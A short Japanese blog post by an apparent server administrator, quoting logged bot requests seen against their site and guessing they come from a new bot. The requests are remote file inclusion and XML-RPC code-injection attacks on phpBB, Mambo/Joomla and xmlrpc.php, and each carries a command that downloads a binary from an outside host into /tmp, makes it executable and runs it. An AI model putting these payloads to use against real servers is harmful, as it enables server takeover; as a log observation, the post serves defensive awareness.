phpファイルへの妙なアクセス
最近、下記のようなリクエストをよく見る。
- GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.***/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.***/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1
- GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.***/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.***/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1
- GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.***/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.***/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1
- POST /xmlrpc.php HTTP/1.1 < ?xml version="1.0"? > < methodCall > < methodName > test.method < /methodName > < params > < param > < value > < name > ',''));echo '_begin_';echo `cd /tmp;wget 216.15.209.***/criman;chmod +x criman;./criman `;echo '_end_';exit;/* < /name > < /value > < /param > < /params > < /methodCall >
まだ、アクセス先のファイルを取っていないので、詳細は分からないが新種のbotだろう。最近はこの手のものが非常に多いので、ログが見難い。但しファイルを取ってきて、家で眺めるのは楽しいので、家に帰ったら早速集めてみたい。